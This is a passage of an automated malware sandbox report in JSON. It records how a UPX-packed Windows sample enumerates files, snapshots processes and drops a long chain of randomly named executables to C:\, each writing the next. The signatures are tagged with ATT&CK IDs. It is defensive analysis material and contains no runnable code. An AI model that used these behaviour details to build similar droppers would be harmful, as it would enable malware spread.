\"511bca581824f939cba8f72afb50c5d8838269f61c8d4e147cc37b8f55927f0e.exe\" called \"FindNextFileW\" with parameter config.sys (UID: 00000000-00006096)\n \"511bca581824f939cba8f72afb50c5d8838269f61c8d4e147cc37b8f55927f0e.exe\" called \"FindNextFileW\" with parameter Documents and Settings (UID: 00000000-00006096)\n \"511bca581824f939cba8f72afb50c5d8838269f61c8d4e147cc37b8f55927f0e.exe\" called \"FindNextFileW\" with parameter dotnet.au3 (UID: 00000000-00006096)\n \"511bca581824f939cba8f72afb50c5d8838269f61c8d4e147cc37b8f55927f0e.exe\" called \"FindNextFileW\" with parameter dotnet48.exe (UID: 00000000-00006096)\n \"511bca581824f939cba8f72afb50c5d8838269f61c8d4e147cc37b8f55927f0e.exe\" called \"FindNextFileW\" with parameter MSOCache (UID: 00000000-00006096)\n \"511bca581824f939cba8f72afb50c5d8838269f61c8d4e147cc37b8f55927f0e.exe\" called \"FindNextFileW\" with parameter pagefile.sys (UID: 00000000-00006096)\n \"511bca581824f939cba8f72afb50c5d8838269f61c8d4e147cc37b8f55927f0e.exe\" called \"FindNextFileW\" with parameter PerfLogs (UID: 00000000-00006096)\n \"511bca581824f939cba8f72afb50c5d8838269f61c8d4e147cc37b8f55927f0e.exe\" called \"FindNextFileW\" with parameter Program Files (UID: 00000000-00006096)\n \"511bca581824f939cba8f72afb50c5d8838269f61c8d4e147cc37b8f55927f0e.exe\" called \"FindNextFileW\" with parameter ProgramData (UID: 00000000-00006096)\n \"511bca581824f939cba8f72afb50c5d8838269f61c8d4e147cc37b8f55927f0e.exe\" called \"FindNextFileW\" with parameter Recovery (UID: 00000000-00006096)\n \"511bca581824f939cba8f72afb50c5d8838269f61c8d4e147cc37b8f55927f0e.exe\" called \"FindNextFileW\" with parameter System Volume Information (UID: 00000000-00006096)\n \"511bca581824f939cba8f72afb50c5d8838269f61c8d4e147cc37b8f55927f0e.exe\" called \"FindNextFileW\" with parameter Temp (UID: 00000000-00006096)\n \"511bca581824f939cba8f72afb50c5d8838269f61c8d4e147cc37b8f55927f0e.exe\" called \"FindNextFileW\" with parameter TorService (UID: 00000000-00006096)\n \"511bca581824f939cba8f72afb50c5d8838269f61c8d4e147cc37b8f55927f0e.exe\" called \"FindNextFileW\" with parameter Users (UID: 00000000-00006096)\n \"511bca581824f939cba8f72afb50c5d8838269f61c8d4e147cc37b8f55927f0e.exe\" called \"FindNextFileW\" with parameter vftrx.exe (UID: 00000000-00006096)\n \"511bca581824f939cba8f72afb50c5d8838269f61c8d4e147cc37b8f55927f0e.exe\" called \"FindNextFileW\" with parameter Windows (UID: 00000000-00006096)\n \"vftrx.exe\" called \"FindFirstFileW\" with parameter c:\\*.* (UID: 00000000-00006136)\n \"vftrx.exe\" called \"FindNextFileW\" with parameter $Recycle.Bin (UID: 00000000-00006136)\n \"vftrx.exe\" called \"FindNextFileW\" with parameter 06626.exe (UID: 00000000-00006136)\n \"vftrx.exe\" called \"FindNextFileW\" with parameter 511bca581824f939cba8f72afb50c5d8838269f61c8d4e147cc37b8f55927f0e.exe (UID: 00000000-00006136)", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-103", "type": 6, "relevance": 3, "name": "Calls an API typically used for taking snapshot of the specified processes", "description": "\"0260006.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"xlrdpdb.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"lnxndll.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"8028040.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"ndfntv.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"8420244.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"bdppl.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"dtxrlp.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"pdbtf.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"pbbvvxt.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"64226.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"8608268.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"6062268.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"4240462.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"xffxhjl.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"rptdfh.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"blphnxr.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"frljb.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"64826.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"64600.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"642428.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"444002.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"620262.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"628644.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"00288.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Unusual Characteristics", "identifier": "static-4", "relevance": 10, "name": "Entrypoint in PE header is within an uncommon section", "description": "\"511bca581824f939cba8f72afb50c5d8838269f61c8d4e147cc37b8f55927f0e\" has an entrypoint in section \"UPX1\"\n \"hnldj.exe\" has an entrypoint in section \"UPX1\"\n \"txvhpv.exe\" has an entrypoint in section \"UPX1\"\n \"800884.exe\" has an entrypoint in section \"UPX1\"\n \"800608.exe\" has an entrypoint in section \"UPX1\"\n \"082060.exe\" has an entrypoint in section \"UPX1\"\n \"22802.exe\" has an entrypoint in section \"UPX1\"\n \"2224020.exe\" has an entrypoint in section \"UPX1\"\n \"8886462.exe\" has an entrypoint in section \"UPX1\"\n \"dhpnj.exe\" has an entrypoint in section \"UPX1\"\n \"bnhphvh.exe\" has an entrypoint in section \"UPX1\"\n \"64462.exe\" has an entrypoint in section \"UPX1\"\n \"tddht.exe\" has an entrypoint in section \"UPX1\"\n \"hfnrrt.exe\" has an entrypoint in section \"UPX1\"\n \"drtpjh.exe\" has an entrypoint in section \"UPX1\"\n \"482486.exe\" has an entrypoint in section \"UPX1\"\n \"0484408.exe\" has an entrypoint in section \"UPX1\"\n \"2226066.exe\" has an entrypoint in section \"UPX1\"\n \"60440.exe\" has an entrypoint in section \"UPX1\"\n \"2822060.exe\" has an entrypoint in section \"UPX1\"\n \"46000.exe\" has an entrypoint in section \"UPX1\"\n \"644802.exe\" has an entrypoint in section \"UPX1\"\n \"288022.exe\" has an entrypoint in section \"UPX1\"\n \"446022.exe\" has an entrypoint in section \"UPX1\"\n \"fdrnfdr.exe\" has an entrypoint in section \"UPX1\"", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "api-43", "type": 6, "relevance": 10, "name": "Writes a PE file header to disc", "description": "\"511bca581824f939cba8f72afb50c5d8838269f61c8d4e147cc37b8f55927f0e.exe\" wrote 14409 bytes starting with PE header signature to file \"C:\\vftrx.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"vftrx.exe\" wrote 14426 bytes starting with PE header signature to file \"C:\\06626.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"06626.exe\" wrote 14437 bytes starting with PE header signature to file \"C:\\28482.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"28482.exe\" wrote 14457 bytes starting with PE header signature to file \"C:\\0260006.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"0260006.exe\" wrote 14473 bytes starting with PE header signature to file \"C:\\44628.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"44628.exe\" wrote 14484 bytes starting with PE header signature to file \"C:\\xlrdpdb.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"xlrdpdb.exe\" wrote 14494 bytes starting with PE header signature to file \"C:\\lnxndll.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"lnxndll.exe\" wrote 14505 bytes starting with PE header signature to file \"C:\\8028040.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"8028040.exe\" wrote 14516 bytes starting with PE header signature to file \"C:\\ndfntv.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"ndfntv.exe\" wrote 14532 bytes starting with PE header signature to file \"C:\\lvvdvpj.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"lvvdvpj.exe\" wrote 14543 bytes starting with PE header signature to file \"C:\\460060.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"460060.exe\" wrote 14556 bytes starting with PE header signature to file \"C:\\8420244.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"8420244.exe\" wrote 14568 bytes starting with PE header signature to file \"C:\\bdppl.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"bdppl.exe\" wrote 14586 bytes starting with PE header signature to file \"C:\\dtxrlp.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"dtxrlp.exe\" wrote 14602 bytes starting with PE header signature to file \"C:\\pdbtf.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"pdbtf.exe\" wrote 14619 bytes starting with PE header signature to file \"C:\\pbbvvxt.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"pbbvvxt.exe\" wrote 14637 bytes starting with PE header signature to file \"C:\\jftjpxt.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"jftjpxt.exe\" wrote 14651 bytes starting with PE header signature to file \"C:\\64226.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"64226.exe\" wrote 14669 bytes starting with PE header signature to file \"C:\\28800.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"28800.exe\" wrote 14679 bytes starting with PE header signature to file \"C:\\20046.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"20046.exe\" wrote 14690 bytes starting with PE header signature to file \"C:\\8608268.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"8608268.exe\" wrote 14709 bytes starting with PE header signature to file \"C:\\6062268.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"6062268.exe\" wrote 14728 bytes starting with PE header signature to file \"C:\\6884282.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"6884282.exe\" wrote 14746 bytes starting with PE header signature to file \"C:\\4688686.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"4688686.exe\" wrote 14761 bytes starting with PE header signature to file \"C:\\4240462.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"4240462.exe\" wrote 14777 bytes starting with PE header signature to file \"C:\\68448.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"68448.exe\" wrote 14796 bytes starting with PE header signature to file \"C:\\vpdhr.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"vpdhr.exe\" wrote 14813 bytes starting with PE header signature to file \"C:\\xffxhjl.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"xffxhjl.exe\" wrote 14830 bytes starting with PE header signature to file \"C:\\nblhvh.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"nblhvh.exe\" wrote 14847 bytes starting with PE header signature to file \"C:\\rhlpfp.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"rhlpfp.exe\" wrote 14858 bytes starting with PE header signature to file \"C:\\pvjjxn.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"pvjjxn.exe\" wrote 14875 bytes starting with PE header signature to file \"C:\\rptdfh.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"rptdfh.exe\" wrote 14891 bytes starting with PE header signature to file \"C:\\jxhdr.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"jxhdr.exe\" wrote 14907 bytes starting with PE header signature to file \"C:\\blphnxr.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"blphnxr.exe\" wrote 14920 bytes starting with PE header signature to file \"C:\\dthbf.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"dthbf.exe\" wrote 14933 bytes starting with PE header signature to file \"C:\\bbxnv.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"bbxnv.exe\" wrote 14946 bytes starting with PE header signature to file \"C:\\ffdpvvb.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"ffdpvvb.exe\" wrote 14960 bytes starting with PE header signature to file \"C:\\vjnxj.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"vjnxj.exe\" wrote 14977 bytes starting with PE header signature to file \"C:\\hpfbrjf.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"hpfbrjf.exe\" wrote 14991 bytes starting with PE header signature to file \"C:\\dhrldf.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"dhrldf.exe\" wrote 15006 bytes starting with PE header signature to file \"C:\\frljb.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"frljb.exe\" wrote 15024 bytes starting with PE header signature to file \"C:\\xjntxb.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"xjntxb.exe\" wrote 15042 bytes starting with PE header signature to file \"C:\\64826.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"64826.exe\" wrote 15058 bytes starting with PE header signature to file \"C:\\64600.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"64600.exe\" wrote 15073 bytes starting with PE header signature to file \"C:\\642428.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"642428.exe\" wrote 15083 bytes starting with PE header signature to file \"C:\\444002.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"444002.exe\" wrote 15098 bytes starting with PE header signature to file \"C:\\620262.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"620262.exe\" wrote 15113 bytes starting with PE header signature to file \"C:\\628644.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"628644.exe\" wrote 15131 bytes starting with PE header signature to file \"C:\\60860.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"60860.exe\" wrote 15148 bytes starting with PE header signature to file \"C:\\46248.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"46248.exe\" wrote 15160 bytes starting with PE header signature to file \"C:\\00288.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"00288.exe\" wrote 15170 bytes starting with PE header signature to file \"C:\\682606.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"682606.exe\" wrote 15186 bytes starting with PE header signature to file \"C:\\jdrfr.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"jdrfr.exe\" wrote 15203 bytes starting with PE header signature to file \"C:\\jjtrtt.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"jjtrtt.exe\" wrote 15221 bytes starting with PE header signature to file \"C:\\nvpvtb.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"nvpvtb.exe\" wrote 15233 bytes starting with PE header signature to file \"C:\\jptlrlr.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"jptlrlr.exe\" wrote 15251 bytes starting with PE header signature to file \"C:\\ldpnpvp.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"ldpnpvp.exe\" wrote 15268 bytes starting with PE header signature to file \"C:\\jbvpj.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"jbvpj.exe\" wrote 15287 bytes starting with PE header signature to file \"C:\\fdrnfdr.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"fdrnfdr.exe\" wrote 15298 bytes starting with PE header signature to file \"C:\\446022.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"446022.exe\" wrote 15310 bytes starting with PE header signature to file \"C:\\288022.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"288022.exe\" wrote 15327 bytes starting with PE header signature to file \"C:\\644802.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"644802.exe\" wrote 15344 bytes starting with PE header signature to file \"C:\\46000.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"46000.exe\" wrote 15354 bytes starting with PE header signature to file \"C:\\2822060.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...", "origin": "API Call", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "binary-1", "type": 8, "relevance": 10, "name": "Drops executable files", "description": "\"hnldj.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"txvhpv.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"800884.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"800608.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"082060.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"22802.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"2224020.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"8886462.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"dhpnj.exe\" has type \"PE32 executable 